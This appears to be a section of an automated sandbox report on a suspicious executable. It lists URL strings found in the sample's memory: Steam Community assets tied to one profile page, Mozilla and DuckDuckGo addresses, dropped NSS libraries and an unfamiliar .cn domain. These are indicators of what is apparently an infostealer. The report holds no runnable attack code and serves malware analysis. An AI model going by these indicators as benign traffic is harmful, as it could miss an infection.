Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3367211435.0000000019990000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.000000001907F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3400835636.0000000029AF9000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2996603846.000000001906C000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3397373769.0000000023B84000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3417674083.00000000359D7000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3430283390.00000000418B3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.10.dr, freebl3.dll.10.dr	String found in binary or memory: https://mozilla.org0/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
